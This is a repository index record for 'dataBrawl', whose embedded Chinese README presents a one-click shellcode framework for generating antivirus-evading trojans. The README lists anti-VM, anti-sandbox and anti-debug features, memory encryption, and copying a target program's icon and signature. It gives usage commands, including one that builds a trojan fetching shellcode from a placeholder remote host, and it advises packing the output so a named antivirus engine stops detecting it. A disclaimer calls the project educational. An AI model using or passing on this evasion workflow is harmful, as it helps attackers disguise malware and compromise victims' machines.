{"id":17383358,"url":"https://github.com/cherno-x/databrawl","last_synced_at":"2025-10-16T05:12:10.520Z","repository":{"id":233758946,"uuid":"787766022","full_name":"Cherno-x/dataBrawl","owner":"Cherno-x","description":"一键生成免杀木马的 shellcode 免杀框架","archived":false,"fork":false,"pushed_at":"2024-06-28T09:25:57.000Z","size":23339,"stargazers_count":178,"open_issues_count":0,"forks_count":23,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-05-09T00:01:58.778Z","etag":null,"topics":["antivirus","infosec","redteam","redteam-tools","security-tools","shellcode"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Cherno-x.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-17T06:27:54.000Z","updated_at":"2025-05-04T10:31:01.000Z","dependencies_parsed_at":"2024-10-16T07:41:30.166Z","dependency_job_id":"33c175a1-9506-4977-b135-9df04205996e","html_url":"https://github.com/Cherno-x/dataBrawl","commit_stats":null,"previous_names":["cherno-x/databrawl"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Cherno-x%2FdataBrawl/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Cherno-x","download_url":"https://codeload.github.com/Cherno-x/dataBrawl/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253166502,"owners_count":21864475,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus","infosec","redteam","redteam-tools","security-tools","shellcode"],"created_at":"2024-10-16T07:41:23.055Z","updated_at":"2025-10-16T05:12:10.409Z","avatar_url":"https://github.com/Cherno-x.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# dataBrawl\r\n\r\n**（2024年6月28日注：大型活动期间暂停维护，已删除核心template）**\r\n\r\n![dataBrawl](./assets/dataBrawl.png)\r\n\r\n一款一键化生成免杀木马的shellcode免杀框架，具备**本地加载**方式和**远程加载**方式。\r\n\r\n## Feature\r\n1. 本地/分离加载\r\n2. ollvm混淆编译/gcc编译\r\n3. IAT obfuscate\r\n4. Anti-VM\r\n5. Anti-Sandbox（API Hammering，自定义sleep）\r\n6. Anti-Debug\r\n7. 内存加密\r\n8. add resource/sign\r\n\r\n\r\n\r\n\r\n## 环境准备\r\n\r\n本工具使用mingw或ollvm编译，ollvm编译无需准备编译环境（生成exe较大，qvm需额外操作）\r\n\r\n使用mingw编译需要准备好编译环境，下载mingw编译器：\r\n\r\n官网地址：https://www.mingw-w64.org/\r\n\r\nWindows下载链接： https://sourceforge.net/projects/mingw-w64/files/\r\n\r\n我下载的是x86_64-win32-seh，具体请根据系统情况适配，也可以直接下载online installer\r\n\r\n\u003cimg src=\"./assets/image-20240417134130271.png\" alt=\"image-20240417134130271\" style=\"zoom:50%;\" /\u003e\r\n\r\n\r\n\r\n添加系统环境变量：\r\n\r\npath = 解压目录/mingw64/bin\r\n\r\n最好把include和lib也对应添加到环境变量的include和lib中，以免编译找不到链接库\r\n\r\n\r\n\r\n## 使用说明\r\n\r\npython dataBrawl.py -h\r\n\r\n![image-20240625170435636](./assets/image-20240625170435636.png)\r\n\r\n#### 本地加载shellcode\r\n\r\nCS或其他C2生成shellcode\r\n\r\n![image-20240417140327230](./assets/image-20240417140327230.png)\r\n\r\n-i 指复制目标exe的资源、图标和签名信息\r\n\r\n```shell\r\npython dataBrawl.py D:\\Dev\\dataBrawl\\payload_x64.bin -b 1 -t stdtemp -i \"C:\\Users\\xxx\"\r\n```\r\n\r\n![image-20240625170651334](./assets/image-20240625170651334.png)\r\n\r\n默认在项目跟目录生成result.exe，也可-o指定输出位置\r\n\r\n这里是使用gcc编译，目前qvm未报毒，ollvm编译把-b选项输入2，目前qvm存在问题，可以再加个壳，我这里使用enigma protector ，自己大概选择配置下，qvm都无法拦截。https://down.52pojie.cn/Tools/Packers/The_Enigma_Protector_v7.40_x32_x64.rar 不过qvm比较玄学，可能过两天就报毒了，可以直接ollvm编译+壳。\r\n\r\n![image-20240626110232217](./assets/image-20240626110232217.png)\r\n\r\n使用ollvm加壳后如果还杀，就改一下加壳的选项。\r\n\r\n\r\n\r\n#### 远程加载shellcode\r\n\r\n先生成加密shellcode\r\n\r\n```\r\npython dataBrawl.py D:\\Dev\\dataBrawl\\payload_x64.bin -c 1 -t remote\r\n```\r\n\r\n使用远程模板生成木马\r\n\r\n```shell\r\npython dataBrawl.py http://www.xxx.com/shellcode.bin -b 1 -t remote -i \"C:\\Users\\xxx\"\r\n```\r\n\r\n\r\n\r\n# ⚠️ Warning\r\n\r\n**免责声明:** 请注意，本仓库仅用于学习和研究目的。在使用任何与恶意软件开发相关的技术时，请遵守当地法律法规，不要进行任何违法活动。对于任何不当使用造成的后果，本仓库的维护者不承担任何责任。\r\n\r\n欢迎提出建议、报告漏洞或贡献代码以改进本仓库的内容。让我们共同努力，提高网络安全意识和技术水平！\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcherno-x%2Fdatabrawl","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcherno-x%2Fdatabrawl","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcherno-x%2Fdatabrawl/lists"}